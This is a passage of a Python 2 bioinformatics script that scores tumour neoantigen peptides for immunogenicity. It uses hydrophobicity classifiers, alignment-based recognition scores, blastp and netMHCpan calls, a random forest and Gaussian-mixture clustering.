    neg_pep_hydro_list=[hydro_vector(p) for p in neg_pep_list]
    X=pos_pep_hydro_list+neg_pep_hydro_list
    X_scale = StandardScaler().fit_transform(X)
    # Labels: 1 = positive (binder), 0 = negative.
    y=[1]*len(pos_pep_hydro_list)+[0]*len(neg_pep_hydro_list)
    # NearMiss v1 undersampling to balance the classes before fitting.
    nm1 = NearMiss(random_state=0, version=1)
    X_resampled_nm1, y_resampled_nm1 = nm1.fit_sample(X, y)
    clf_mlp = MLPClassifier(solver='lbfgs', alpha=1e-5, hidden_layer_sizes=(3), random_state=0)
    clf_mlp.fit(X_resampled_nm1, y_resampled_nm1)
    #hydro_score=clf_mlp.predict_prob([hydro_vector[pep]])
    return clf_mlp
#def Train_bioactivity_rf():
def aligner(seq1,seq2):
    """Local alignment of two peptides with BLOSUM62 (gap open -11, extend -1).

    Sequences are upper-cased first; returns the list of alignments produced
    by Bio.pairwise2.align.localds (may be empty).
    """
    scoring_matrix = matlist.blosum62
    open_penalty = -11
    extend_penalty = -1
    return pairwise2.align.localds(seq1.upper(), seq2.upper(), scoring_matrix, open_penalty, extend_penalty)
def logSum(v):
    """Numerically stable log(sum(exp(v))) using the max-shift trick."""
    shift = max(v)
    return shift + log(sum(exp(x - shift) for x in v))
def calculate_R(neo_seq,iedb_seq):
    """TCR-recognition score R of a neoantigen against a set of IEDB epitopes.

    For each epitope the best local-alignment score against neo_seq is turned
    into a binding energy -k*(a - score), and R is the partition-function
    ratio exp(logSum(energies) - logSum(energies + [0])), i.e. a value in
    (0, 1) that grows with similarity to known immunogenic epitopes.

    NOTE(review): k and a are module-level constants defined elsewhere in the
    file; a duplicate definition of this function appears later in the module.
    """
    align_score=[]
    #i=0
    for seq in iedb_seq:
        aln_score=aligner(neo_seq,seq)
        #i=i+1
        #print i
        #print aln_score
        # Keep the best score over all alignments; epitopes with no local
        # alignment at all are skipped entirely.
        if aln_score!=[]:
            localds_core=max([line[2] for line in aln_score])
            align_score.append(localds_core)
    #print align_score
    #print k,a
    # Python 2 map returns a list here, so list concatenation below is valid.
    bindingEnergies=map(lambda x: -k*(a-x),align_score)
    #print bindingEnergies
    lZk=logSum(bindingEnergies+[0])
    lGb=logSum(bindingEnergies)
    R=exp(lGb-lZk)
    return R
def GetNmerPositivePep(n,mhc_pos_file):
    """Collect all length-n peptides from the positive FASTA file.

    Header lines (starting with '>') are skipped; sequence lines are stripped
    of surrounding whitespace and kept only when exactly n residues long.

    Fix: the input file is now closed deterministically via a context manager
    (the original iterated an open() result and leaked the handle).
    """
    pep_list = []
    with open(mhc_pos_file) as handle:
        for line in handle:
            if line.startswith(">"):
                continue
            record = line.strip()
            if len(record) == n:
                pep_list.append(record)
    return pep_list
def GetNmerNegativePep(n,mhc_neg_file):
    """Collect all length-n peptides from the negative FASTA file.

    Header lines (starting with '>') are skipped; sequence lines are stripped
    of surrounding whitespace and kept only when exactly n residues long.

    Fix: the input file is now closed deterministically via a context manager
    (the original iterated an open() result and leaked the handle).
    """
    pep_list = []
    with open(mhc_neg_file) as handle:
        for line in handle:
            if line.startswith(">"):
                continue
            record = line.strip()
            if len(record) == n:
                pep_list.append(record)
    return pep_list
def hydro_vector(pep):
    """Return the Kyte-Doolittle hydropathy value for each residue of *pep*.

    Fix: this duplicate definition depended on a module-global `hydro_score`
    dict that is only ever defined as a local inside the earlier hydro_vector
    definition (NameError at call time). The scale is now embedded, with the
    exact values used by the earlier definition, so the function is
    self-contained and the two definitions agree.
    """
    hydro_score = {"A": 1.8, "C": 2.5, "D": -3.5, "E": -3.5, "F": 2.8,
                   "G": -0.4, "H": -3.2, "I": 4.5, "K": -3.9, "L": 3.8,
                   "M": 1.9, "N": -3.5, "P": -1.6, "Q": -3.5, "R": -4.5,
                   "S": -0.8, "T": -0.7, "V": 4.2, "W": -0.9, "Y": -1.3}
    return [hydro_score[residue.upper()] for residue in pep]
def getXY(n,mhc_pos_file,mhc_neg_file):
    """Build the (features, labels) training arrays for n-mer peptides.

    Positive peptides are labelled 1 and negatives 0; each peptide is encoded
    as its per-residue hydrophobicity vector. Returns two numpy arrays.
    """
    positives = GetNmerPositivePep(n, mhc_pos_file)
    negatives = GetNmerNegativePep(n, mhc_neg_file)
    # Encode every peptide as a hydrophobicity vector, positives first.
    feature_rows = [hydro_vector(p) for p in positives]
    feature_rows += [hydro_vector(p) for p in negatives]
    labels = [1] * len(positives) + [0] * len(negatives)
    return np.asarray(feature_rows), np.asarray(labels)
def get_hydro_model(mhc_pos_file,mhc_neg_file):
    """Fit one XGBoost hydrophobicity classifier per peptide length (9/10/11).

    Returns the three fitted classifiers as (hy_xgb_9, hy_xgb_10, hy_xgb_11).
    The per-length hyper-parameters are unchanged from the original tuned
    values (cross-validated AUCs recorded in the original comments).

    Fix: the three near-identical 12-line classifier constructions are
    collapsed into one private factory; only the tuned values vary.
    """
    def _make_xgb(n_estimators, max_depth, gamma):
        # Shared settings for every length; only the tuned values differ.
        return XGBClassifier(
            learning_rate=0.1,
            n_estimators=n_estimators,
            max_depth=max_depth,
            min_child_weight=1,
            gamma=gamma,
            subsample=0.8,
            colsample_bytree=0.8,
            objective='binary:logistic',
            n_jobs=4,
            scale_pos_weight=1,
            random_state=27)
    models = []
    # (peptide length, n_estimators, max_depth, gamma) per tuned configuration:
    # 9-mer  [207] train-auc 0.952 / test-auc 0.853
    # 10-mer [164] train-auc 1.000 / test-auc 0.900
    # 11-mer [122] tuned with gamma=0.1
    for length, n_estimators, max_depth, gamma in (
            (9, 208, 5, 0),
            (10, 165, 16, 0),
            (11, 123, 5, 0.1)):
        X_array, y_array = getXY(length, mhc_pos_file, mhc_neg_file)
        models.append(_make_xgb(n_estimators, max_depth, gamma).fit(X_array, y_array))
    return models[0], models[1], models[2]
def logSum(v):
    """Stable log-sum-exp of v: exponentiate after shifting by the maximum."""
    peak = max(v)
    total = sum(exp(value - peak) for value in v)
    return log(total) + peak
def aligner(seq1,seq2):
    """Case-insensitive BLOSUM62 local alignment of two peptide sequences.

    Gap open -11, gap extend -1; returns all alignments reported by
    Bio.pairwise2.align.localds (possibly an empty list).
    """
    blosum = matlist.blosum62
    return pairwise2.align.localds(seq1.upper(), seq2.upper(), blosum, -11, -1)
def calculate_R(neo_seq,iedb_seq):
    """TCR-recognition score R of neo_seq against the IEDB epitope set.

    The best local-alignment score per epitope becomes a binding energy
    -k*(a - score) (k and a are module-level constants); R is then
    exp(logSum(energies) - logSum(energies + [0])), a value in (0, 1).
    Epitopes yielding no alignment at all are skipped.
    """
    align_score = []
    for epitope in iedb_seq:
        alignments = aligner(neo_seq, epitope)
        if alignments:
            align_score.append(max(hit[2] for hit in alignments))
    bindingEnergies = [-k * (a - score) for score in align_score]
    # Partition-function ratio: adding the zero-energy reference state to the
    # denominator bounds R inside (0, 1).
    lZk = logSum(bindingEnergies + [0])
    lGb = logSum(bindingEnergies)
    return exp(lGb - lZk)
############similarity############
def cal_similarity_per(mut_seq,normal_seq):
    """Self-normalised alignment similarity of mut_seq versus normal_seq.

    Ratio of the best mut-vs-normal local-alignment score to the best
    mut-vs-mut (self) score, so an identical pair scores 1.0.

    Fix: the numerator is coerced to float before dividing -- under Python 2,
    two integer alignment scores would otherwise floor-divide to 0 or 1.
    """
    score_pair = aligner(mut_seq, normal_seq)[0][2]
    score_self = aligner(mut_seq, mut_seq)[0][2]
    return float(score_pair) / score_self
def get_homolog_info(mut_seq,hla_type,blastp_tmp_file,blastp_out_tmp_file,netMHCpan_pep_tmp_file,netMHCpan_ml_out_tmp_file,blast_db_path):
    """Find a same-length human homolog of mut_seq via blastp and score it
    with netMHCpan for the given HLA allele.

    Returns (human_homolog_pep, human_homolog_pep_el): the homolog peptide
    (mut_seq itself when blastp yields no equal-length hit) and the %EL rank
    parsed from column 13 of the netMHCpan output. Both external tools are
    invoked through the shell; the *_tmp_file paths carry the intermediate
    FASTA/report files.
    """
    # netMHCpan expects the allele name without the '*' separator.
    hla_type_in=hla_type.replace('*','')
    blastp_fasta_line='>'+'\n'+mut_seq+'\n'
    #print blastp_fasta_line
    pep_len=len(mut_seq)
    f=open(blastp_tmp_file,'w')
    f.write(blastp_fasta_line)
    f.close()
    # Extremely permissive e-value so that short peptide queries still hit.
    str_blastp_pro='blastp -query ' + blastp_tmp_file + ' -db ' + blast_db_path + ' -out ' + blastp_out_tmp_file + ' -evalue 200000 -comp_based_stats 0'
    print str_blastp_pro
    subprocess.call(str_blastp_pro,shell = True,executable = '/bin/bash')
    # Scan the blastp report: take the first 'Sbjct' line whose aligned
    # fragment (3rd whitespace-separated field) matches the query length.
    # NOTE(review): the else-branch resets the fallback to mut_seq on every
    # non-'Sbjct' line, so the fallback only sticks if no equal-length hit
    # is found before the report ends.
    for line in open(blastp_out_tmp_file):
        if line.startswith('Sbjct'):
            human_pep_record=line.strip().split(' ')
            human_pep = [i for i in human_pep_record if i!=''][2]
            #print len(human_pep)
            if len(human_pep)==pep_len:
                human_homolog_pep=(human_pep)
                break
            else:
                continue
        else:
            #print 'no equal length peptide!'
            human_homolog_pep=mut_seq
            continue
    print human_homolog_pep
    # Score the homolog with netMHCpan in peptide-list mode.
    f=open(netMHCpan_pep_tmp_file,'w')
    f.write(human_homolog_pep+'\n')
    f.close()
    str_netMHCpan_ml_pro='netMHCpan -p ' + netMHCpan_pep_tmp_file + ' -a ' + hla_type_in + ' > ' + netMHCpan_ml_out_tmp_file
    print str_netMHCpan_ml_pro
    subprocess.call(str_netMHCpan_ml_pro,shell = True,executable = '/bin/bash')
    # Data rows in netMHCpan output start with whitespace; keep the %EL rank
    # (column 13) of the last such row.
    for line in open(netMHCpan_ml_out_tmp_file):
        if not line.startswith(' '):
            continue
        else:
            record=line.strip().split(' ')
            ml_record = [i for i in record if i!='']
            human_homolog_pep_el=ml_record[12]
    return human_homolog_pep,human_homolog_pep_el
def get_EL_info(seq,hla_type,netMHCpan_pep_tmp_file,netMHCpan_ml_out_tmp_file):
    """Run netMHCpan on a single peptide and return its %EL rank.

    The peptide is written to netMHCpan_pep_tmp_file, netMHCpan is invoked
    through the shell for the given HLA allele (with '*' stripped), and the
    %EL rank (column 13) of the last data row in the report is returned as a
    string. Returns the initial empty list if the report has no data rows.
    """
    # netMHCpan expects the allele name without the '*' separator.
    hla_type_in=hla_type.replace('*','')
    f=open(netMHCpan_pep_tmp_file,'w')
    f.write(seq+'\n')
    f.close()
    str_netMHCpan_ml_pro='netMHCpan -p ' + netMHCpan_pep_tmp_file + ' -a ' + hla_type_in + ' > ' + netMHCpan_ml_out_tmp_file
    print str_netMHCpan_ml_pro
    subprocess.call(str_netMHCpan_ml_pro,shell = True,executable = '/bin/bash')
    pep_el_rank=[]
    # Data rows start with whitespace; each overwrites pep_el_rank, so the
    # value from the last data row wins.
    for line in open(netMHCpan_ml_out_tmp_file):
        if not line.startswith(' '):
            continue
        else:
            record=line.strip().split(' ')
            ml_record = [i for i in record if i!='']
            pep_el_rank=ml_record[12]
    return pep_el_rank
#read in data
def InVivoModelAndScoreSNV(mhc_pos_file,mhc_neg_file,neo_file,model_train_file,neo_model_file,blastp_tmp_file,blastp_out_tmp_file,netMHCpan_pep_tmp_file,netMHCpan_ml_out_tmp_file,iedb_file,blast_db_path,immunogenicity_gmm_all_score_ranking,immunogenicity_gmm_pos_score_ranking,gmm_classification_file,immunogenicity_bioactive_score_ranking):
    """Score SNV-derived neoantigen candidates and write ranked result tables.

    Pipeline: (1) compute per-peptide features -- hydrophobicity (length-
    specific XGBoost models), IEDB recognition score R, blastp homolog and
    netMHCpan EL ranks, self-sequence similarity; (2) rank by a random forest
    trained (after SMOTE oversampling) on model_train_file -> neo_model_file;
    (3) rank by a multiplicative bioactive score ->
    immunogenicity_bioactive_score_ranking; (4) combine expression/clonality
    features, project with PCA and cluster with a 2-component GMM, relabel so
    cluster 1 is the higher-scoring one, and write the all/positive rankings.
    If the input lacks a `tpm` column, the AttributeError branch repeats step
    (4) without the expression feature.
    """
    iedb_seq=get_iedb_seq(iedb_file)
    hy_xgb_9,hy_xgb_10,hy_xgb_11=get_hydro_model(mhc_pos_file,mhc_neg_file)
    data_neo=pd.read_table(neo_file,header=0,sep='\t')
    MT_peptide=data_neo.MT_pep
    HLA=data_neo.HLA_type
    WT_peptide=data_neo.WT_pep
    hydrophobicity_score=[]
    Recognition_score=[]
    Homolog_pep=[]
    Homolog_EL=[]
    MT_peptide_EL=[]
    WT_peptide_EL=[]
    # Per-peptide feature collection: homolog + EL ranks for every row, then
    # the length-matched hydrophobicity model and the recognition score R.
    for i in range(len(MT_peptide)):
        line=MT_peptide[i]
        H_p,H_E=get_homolog_info(line,HLA[i],blastp_tmp_file,blastp_out_tmp_file,netMHCpan_pep_tmp_file,netMHCpan_ml_out_tmp_file,blast_db_path)
        mt_el=get_EL_info(MT_peptide[i],HLA[i],netMHCpan_pep_tmp_file,netMHCpan_ml_out_tmp_file)
        wt_el=get_EL_info(WT_peptide[i],HLA[i],netMHCpan_pep_tmp_file,netMHCpan_ml_out_tmp_file)
        MT_peptide_EL.append(mt_el)
        WT_peptide_EL.append(wt_el)
        Homolog_pep.append(H_p)
        Homolog_EL.append(H_E)
        if len(line)==9:
            h_score=hy_xgb_9.predict_proba(np.array(hydro_vector(line)).reshape((1,9)))[:,1][0]
            hydrophobicity_score.append(h_score)
            R=calculate_R(line,iedb_seq)
            Recognition_score.append(R)
        elif len(line)==10:
            h_score=hy_xgb_10.predict_proba(np.array(hydro_vector(line)).reshape((1,10)))[:,1][0]
            hydrophobicity_score.append(h_score)
            R=calculate_R(line,iedb_seq)
            Recognition_score.append(R)
        elif len(line)==11:
            h_score=hy_xgb_11.predict_proba(np.array(hydro_vector(line)).reshape((1,11)))[:,1][0]
            hydrophobicity_score.append(h_score)
            R=calculate_R(line,iedb_seq)
            Recognition_score.append(R)
        else:
            # Unexpected peptide length: fall back to a neutral 0.5.
            print "Oh no!!"
            print line
            print len(line)
            hydrophobicity_score.append(0.5)
            R=calculate_R(line,iedb_seq)
            Recognition_score.append(R)
    paired_similarity_score=[]
    homolog_similaity_score=[]
    #####paired similarity and homolog similarity########
    for M_P,N_P,H_P in zip(data_neo.MT_pep,data_neo.WT_pep,Homolog_pep):
        print M_P,N_P,H_P
        paired_s=cal_similarity_per(M_P,N_P)
        homolog_s=cal_similarity_per(M_P,H_P)
        paired_similarity_score.append(paired_s)
        homolog_similaity_score.append(homolog_s)
    # Self-sequence similarity = max(paired, homolog) similarity per row.
    self_sequence_similarity=[]
    for i in range(len(paired_similarity_score)):
        if paired_similarity_score[i] >= homolog_similaity_score[i]:
            sss=paired_similarity_score[i]
        else:
            sss=homolog_similaity_score[i]
        self_sequence_similarity.append(sss)
    data_neo["Homolog_pep"]=Homolog_pep
    data_neo["Homolog_Binding_EL"]=Homolog_EL
    data_neo["Recognition_score"]=Recognition_score
    data_neo["Hydrophobicity_score"]=hydrophobicity_score
    data_neo["Self_sequence_similarity"]=self_sequence_similarity
    data_neo["MT_Binding_EL"]=MT_peptide_EL
    data_neo["WT_Binding_EL"]=WT_peptide_EL
    df_neo=data_neo.loc[:,['Hydrophobicity_score','Recognition_score','Self_sequence_similarity','MT_Binding_EL','WT_Binding_EL']]
    # Train the ranking random forest on the reference cohort after SMOTE
    # oversampling of the minority (responder) class.
    data_train = pd.read_table(model_train_file,header=0,sep='\t')
    data_train_dropna=data_train.dropna()
    target = 'response'
    HPcol = 'hydrophobicity_score'
    Rcol = 'Recognition_score'
    SScol = 'self_sequence_similarity'
    ELcol = 'EL_dissimilarity'
    predictors = [x for x in data_train_dropna.columns if x not in [target,'Pep_len',ELcol,'EL_ht_rank']]
    X_train=data_train_dropna[predictors].values
    # NOTE(review): X_train_scale is computed but the forest is fitted on the
    # unscaled, resampled features below.
    X_train_scale = StandardScaler().fit_transform(X_train)
    y_train=data_train_dropna[target].values
    print 'Original dataset shape {}'.format(Counter(y_train))
    sm=SMOTE(k_neighbors=4,kind='borderline1',random_state=42)
    X_res, y_res = sm.fit_sample(X_train,y_train)
    print 'Resampled dataset shape {}'.format(Counter(y_res))
    rf0 = RandomForestClassifier(oob_score=True, random_state=10)
    print rf0
    rf0.fit(X_res, y_res)
    dneo_predprob = rf0.predict_proba(df_neo.values)[:,1]
    print dneo_predprob
    data_neo["model_pro"]=dneo_predprob
    data_neo_out_sort=data_neo.sort_values(['model_pro'],ascending=[0])
    data_neo_out_sort.to_csv(neo_model_file,sep='\t',header=1,index=0)
    # Compact identifier per candidate: gene_change_mutpep_wtpep.
    neoantigen_infor = []
    for i in range(len(data_neo.Gene)):
        neo_infor = data_neo["Gene"][i]+'_'+data_neo["AA_change"][i]+'_'+data_neo["MT_pep"][i]+'_'+data_neo["WT_pep"][i]
        neoantigen_infor.append(neo_infor)
    data_neo["neoantigen_infor"] = neoantigen_infor
    # Logistic transforms of the %EL ranks centred at rank 2: low mutant rank
    # is rewarded, low wild-type rank is penalised.
    f_EL_rank_wt=lambda x:1-(1/(1+math.pow(math.e,5*(float(x)-2))))/2
    f_EL_rank_mt=lambda x:1/(1+math.pow(math.e,5*(float(x)-2)))
    EL_mt_rank_score=data_neo.MT_Binding_EL.apply(f_EL_rank_mt)
    EL_wt_rank_score=data_neo.WT_Binding_EL.apply(f_EL_rank_wt)
    # Bioactive score: product of the per-peptide quality features only.
    bioactive_score=[data_neo.Hydrophobicity_score[i]*data_neo.Recognition_score[i]*data_neo.Self_sequence_similarity[i]*EL_mt_rank_score[i]*EL_wt_rank_score[i] for i in range(len(data_neo.MT_Binding_EL))]
    data_neo["bioactive_score"]=bioactive_score
    data_neo_sortedby_bioactive=data_neo.sort_values(["bioactive_score"],ascending=False)
    data_neo_sortedby_bioactive.to_csv(immunogenicity_bioactive_score_ranking,header=1,index=0,sep='\t')
    # Saturating transform of expression (TPM) via tanh with scale k=1.
    k=1
    f_TPM=lambda x:math.tanh(x/k)
    allele_frequency_score=data_neo.variant_allele_frequency
    netchop_score=data_neo.combined_prediction_score
    cellular_prevalence_score=data_neo.cellular_prevalence
    # If the `tpm` column is missing, the attribute access below raises
    # AttributeError and the except-branch repeats the scoring without it.
    try:
        tpm_score=data_neo.tpm.apply(f_TPM)
        immuno_effect_score=[tpm_score[i]*allele_frequency_score[i]*netchop_score[i]*cellular_prevalence_score[i]*data_neo.Hydrophobicity_score[i]*data_neo.Recognition_score[i]*data_neo.Self_sequence_similarity[i]*EL_mt_rank_score[i]*EL_wt_rank_score[i] for i in range(len(data_neo.MT_Binding_EL))]
        data_feature_select=pd.DataFrame()
        data_feature_select["neoantigen_infor"]=neoantigen_infor
        data_feature_select["EL_mt_rank_score"]=EL_mt_rank_score
        data_feature_select["EL_wt_rank_score"]=EL_wt_rank_score
        data_feature_select["tpm_score"]=tpm_score
        #data_feature_select["tpm_normal_score"]=tpm_normal_score
        data_feature_select["allele_frequency_score"]=allele_frequency_score
        data_feature_select["netchop_score"]=netchop_score
        data_feature_select["cellular_prevalence_score"]=cellular_prevalence_score
        data_feature_select["hydrophobicity_score"]=data_neo.Hydrophobicity_score
        data_feature_select["Recogonition"]=data_neo.Recognition_score
        data_feature_select["Self_sequence_similarity"]=data_neo.Self_sequence_similarity
        data_feature_select["immuno_effect_score"]=immuno_effect_score
        # Feature matrix = all numeric columns (skip the identifier).
        X_neo = data_feature_select.values[:,1:10]
        ####pca on non-standardized data of all 6 feature
        pca = PCA(n_components=2).fit(X_neo)
        X_neo_pca = pca.transform(X_neo)
        #print "PCA result on non-standardized data"
        #print "explained_variance_ratio",pca.explained_variance_ratio_
        #print "explained_variance",pca.explained_variance_
        #print pca.n_components_
        #print pca.components_
        ###plot GMM ellipse
        # Fit a Gaussian mixture with EM using five components
        gmm = mixture.GaussianMixture(n_components=2, covariance_type='full',n_init=5).fit(X_neo_pca)
        plot_results(X_neo_pca, gmm.predict(X_neo_pca), gmm.means_, gmm.covariances_, 0,'Gaussian Mixture',gmm_classification_file)
        #plot_results(X_neo_pca, gmm.predict(X_neo_pca), gmm.means_, gmm.covars_, 0, 'Gaussian Mixture')
        predict_label=gmm.predict(X_neo_pca)
        predict_prob=gmm.predict_proba(X_neo_pca)
        predict_positive_prob=[]
        for i in range(len(predict_prob)):
            pos_prob=predict_prob[i][1]
            predict_positive_prob.append(pos_prob)
        data_feature_select["gmm_label"]=predict_label
        # GMM labels are arbitrary: relabel so cluster 1 is the one with the
        # higher mean immuno_effect_score ("immunogenic" cluster).
        data_gmm_filter_1=data_feature_select[data_feature_select["gmm_label"]==1]
        data_gmm_filter_1_scoreAve=data_gmm_filter_1.immuno_effect_score.sum()/len(data_gmm_filter_1.immuno_effect_score)
        data_gmm_filter_0=data_feature_select[data_feature_select["gmm_label"]==0]
        data_gmm_filter_0_scoreAve=data_gmm_filter_0.immuno_effect_score.sum()/len(data_gmm_filter_0.immuno_effect_score)
        if data_gmm_filter_0_scoreAve > data_gmm_filter_1_scoreAve:
            data_gmm_filter_0.gmm_label=1
            data_gmm_filter_1.gmm_label=0
        else:
            pass
        data_labeled=pd.concat([data_gmm_filter_1,data_gmm_filter_0])
        data_label_sorted=data_labeled.sort_values(["immuno_effect_score"],ascending=False)
        data_label_sorted.to_csv(immunogenicity_gmm_all_score_ranking,header=1,index=0,sep='\t')
        data_gmm_positive=data_label_sorted[data_label_sorted["gmm_label"]==1]
        data_gmm_positive.to_csv(immunogenicity_gmm_pos_score_ranking,header=1,index=0,sep='\t')
    except AttributeError,e:
        # No expression data: same scoring/clustering without the tpm factor.
        print e
        immuno_effect_score=[allele_frequency_score[i]*netchop_score[i]*cellular_prevalence_score[i]*data_neo.Hydrophobicity_score[i]*data_neo.Recognition_score[i]*data_neo.Self_sequence_similarity[i]*EL_mt_rank_score[i]*EL_wt_rank_score[i] for i in range(len(data_neo.MT_Binding_EL))]
        data_feature_select=pd.DataFrame()
        data_feature_select["neoantigen_infor"]=neoantigen_infor
        data_feature_select["EL_mt_rank_score"]=EL_mt_rank_score
        data_feature_select["EL_wt_rank_score"]=EL_wt_rank_score
        data_feature_select["allele_frequency_score"]=allele_frequency_score
        data_feature_select["netchop_score"]=netchop_score
        data_feature_select["cellular_prevalence_score"]=cellular_prevalence_score
        data_feature_select["hydrophobicity_score"]=data_neo.Hydrophobicity_score
        data_feature_select["Recogonition"]=data_neo.Recognition_score
        data_feature_select["Self_sequence_similarity"]=data_neo.Self_sequence_similarity
        data_feature_select["immuno_effect_score"]=immuno_effect_score
        X_neo = data_feature_select.values[:,1:9]
        ####pca on non-standardized data of all 6 feature
        pca = PCA(n_components=2).fit(X_neo)
        X_neo_pca = pca.transform(X_neo)
        #print "PCA result on non-standardized data"
        #print "explained_variance_ratio",pca.explained_variance_ratio_
        #print "explained_variance",pca.explained_variance_
        #print pca.n_components_
        #print pca.components_
        ###plot GMM ellipse
        # Fit a Gaussian mixture with EM using five components
        gmm = mixture.GaussianMixture(n_components=2, covariance_type='full',n_init=5).fit(X_neo_pca)
        plot_results(X_neo_pca, gmm.predict(X_neo_pca), gmm.means_, gmm.covariances_, 0,'Gaussian Mixture',gmm_classification_file)
        #plot_results(X_neo_pca, gmm.predict(X_neo_pca), gmm.means_, gmm.covars_, 0, 'Gaussian Mixture')
        predict_label=gmm.predict(X_neo_pca)
        predict_prob=gmm.predict_proba(X_neo_pca)
        predict_positive_prob=[]
        for i in range(len(predict_prob)):
            pos_prob=predict_prob[i][1]
            predict_positive_prob.append(pos_prob)
        data_feature_select["gmm_label"]=predict_label
        data_gmm_filter_1=data_feature_select[data_feature_select["gmm_label"]==1]
        data_gmm_filter_1_scoreAve=data_gmm_filter_1.immuno_effect_score.sum()/len(data_gmm_filter_1.immuno_effect_score)
        data_gmm_filter_0=data_feature_select[data_feature_select["gmm_label"]==0]
        data_gmm_filter_0_scoreAve=data_gmm_filter_0.immuno_effect_score.sum()/len(data_gmm_filter_0.immuno_effect_score)
        if data_gmm_filter_0_scoreAve > data_gmm_filter_1_scoreAve:
            data_gmm_filter_0.gmm_label=1
            data_gmm_filter_1.gmm_label=0
        else:
            pass
        data_labeled=pd.concat([data_gmm_filter_1,data_gmm_filter_0])
        data_label_sorted=data_labeled.sort_values(["immuno_effect_score"],ascending=False)
        data_label_sorted.to_csv(immunogenicity_gmm_all_score_ranking,header=1,index=0,sep='\t')
        data_gmm_positive=data_label_sorted[data_label_sorted["gmm_label"]==1]
        data_gmm_positive.to_csv(immunogenicity_gmm_pos_score_ranking,header=1,index=0,sep='\t')
def InVivoModelAndScoreINDEL(mhc_pos_file,mhc_neg_file,neo_file,model_train_file,neo_model_file,blastp_tmp_file,blastp_out_tmp_file,netMHCpan_pep_tmp_file,netMHCpan_ml_out_tmp_file,iedb_file,blast_db_path,immunogenicity_gmm_all_score_ranking,immunogenicity_gmm_pos_score_ranking,gmm_classification_file,immunogenicity_bioactive_score_ranking):
    """Score INDEL-derived neoantigen candidates and write ranked tables.

    Same pipeline as InVivoModelAndScoreSNV (features -> random-forest
    ranking -> bioactive-score ranking -> PCA+GMM immunogenicity ranking),
    except that no cellular-prevalence (clonality) feature is used here.
    The AttributeError branch handles inputs lacking a `tpm` column.
    """
    iedb_seq=get_iedb_seq(iedb_file)
    hy_xgb_9,hy_xgb_10,hy_xgb_11=get_hydro_model(mhc_pos_file,mhc_neg_file)
    data_neo=pd.read_table(neo_file,header=0,sep='\t')
    MT_peptide=data_neo.MT_pep
    HLA=data_neo.HLA_type
    WT_peptide=data_neo.WT_pep
    hydrophobicity_score=[]
    Recognition_score=[]
    Homolog_pep=[]
    Homolog_EL=[]
    MT_peptide_EL=[]
    WT_peptide_EL=[]
    # Per-peptide feature collection (homolog, EL ranks, hydrophobicity, R).
    for i in range(len(MT_peptide)):
        line=MT_peptide[i]
        H_p,H_E=get_homolog_info(line,HLA[i],blastp_tmp_file,blastp_out_tmp_file,netMHCpan_pep_tmp_file,netMHCpan_ml_out_tmp_file,blast_db_path)
        mt_el=get_EL_info(MT_peptide[i],HLA[i],netMHCpan_pep_tmp_file,netMHCpan_ml_out_tmp_file)
        wt_el=get_EL_info(WT_peptide[i],HLA[i],netMHCpan_pep_tmp_file,netMHCpan_ml_out_tmp_file)
        MT_peptide_EL.append(mt_el)
        WT_peptide_EL.append(wt_el)
        Homolog_pep.append(H_p)
        Homolog_EL.append(H_E)
        if len(line)==9:
            h_score=hy_xgb_9.predict_proba(np.array(hydro_vector(line)).reshape((1,9)))[:,1][0]
            hydrophobicity_score.append(h_score)
            R=calculate_R(line,iedb_seq)
            Recognition_score.append(R)
        elif len(line)==10:
            h_score=hy_xgb_10.predict_proba(np.array(hydro_vector(line)).reshape((1,10)))[:,1][0]
            hydrophobicity_score.append(h_score)
            R=calculate_R(line,iedb_seq)
            Recognition_score.append(R)
        elif len(line)==11:
            h_score=hy_xgb_11.predict_proba(np.array(hydro_vector(line)).reshape((1,11)))[:,1][0]
            hydrophobicity_score.append(h_score)
            R=calculate_R(line,iedb_seq)
            Recognition_score.append(R)
        else:
            # Unexpected peptide length: fall back to a neutral 0.5.
            print "Oh no!!"
            print line
            print len(line)
            hydrophobicity_score.append(0.5)
            R=calculate_R(line,iedb_seq)
            Recognition_score.append(R)
    paired_similarity_score=[]
    homolog_similaity_score=[]
    #####paired similarity and homolog similarity########
    for M_P,N_P,H_P in zip(data_neo.MT_pep,data_neo.WT_pep,Homolog_pep):
        print M_P,N_P,H_P
        paired_s=cal_similarity_per(M_P,N_P)
        homolog_s=cal_similarity_per(M_P,H_P)
        paired_similarity_score.append(paired_s)
        homolog_similaity_score.append(homolog_s)
    # Self-sequence similarity = max(paired, homolog) similarity per row.
    self_sequence_similarity=[]
    for i in range(len(paired_similarity_score)):
        if paired_similarity_score[i] >= homolog_similaity_score[i]:
            sss=paired_similarity_score[i]
        else:
            sss=homolog_similaity_score[i]
        self_sequence_similarity.append(sss)
    data_neo["Homolog_pep"]=Homolog_pep
    data_neo["Homolog_Binding_EL"]=Homolog_EL
    data_neo["Recognition_score"]=Recognition_score
    data_neo["Hydrophobicity_score"]=hydrophobicity_score
    data_neo["Self_sequence_similarity"]=self_sequence_similarity
    data_neo["MT_Binding_EL"]=MT_peptide_EL
    data_neo["WT_Binding_EL"]=WT_peptide_EL
    df_neo=data_neo.loc[:,['Hydrophobicity_score','Recognition_score','Self_sequence_similarity','MT_Binding_EL','WT_Binding_EL']]
    # Train the ranking random forest on the reference cohort (SMOTE-balanced).
    data_train = pd.read_table(model_train_file,header=0,sep='\t')
    data_train_dropna=data_train.dropna()
    target = 'response'
    HPcol = 'hydrophobicity_score'
    Rcol = 'Recognition_score'
    SScol = 'self_sequence_similarity'
    ELcol = 'EL_dissimilarity'
    predictors = [x for x in data_train_dropna.columns if x not in [target,'Pep_len',ELcol,'EL_ht_rank']]
    X_train=data_train_dropna[predictors].values
    # NOTE(review): X_train_scale is computed but unused; the forest is
    # fitted on the unscaled, resampled features below.
    X_train_scale = StandardScaler().fit_transform(X_train)
    y_train=data_train_dropna[target].values
    print 'Original dataset shape {}'.format(Counter(y_train))
    sm=SMOTE(k_neighbors=4,kind='borderline1',random_state=42)
    X_res, y_res = sm.fit_sample(X_train,y_train)
    print 'Resampled dataset shape {}'.format(Counter(y_res))
    rf0 = RandomForestClassifier(oob_score=True, random_state=10)
    print rf0
    rf0.fit(X_res, y_res)
    dneo_predprob = rf0.predict_proba(df_neo.values)[:,1]
    print dneo_predprob
    data_neo["model_pro"]=dneo_predprob
    data_neo_out_sort=data_neo.sort_values(['model_pro'],ascending=[0])
    data_neo_out_sort.to_csv(neo_model_file,sep='\t',header=1,index=0)
    # Compact identifier per candidate: gene_change_mutpep_wtpep.
    neoantigen_infor = []
    for i in range(len(data_neo.Gene)):
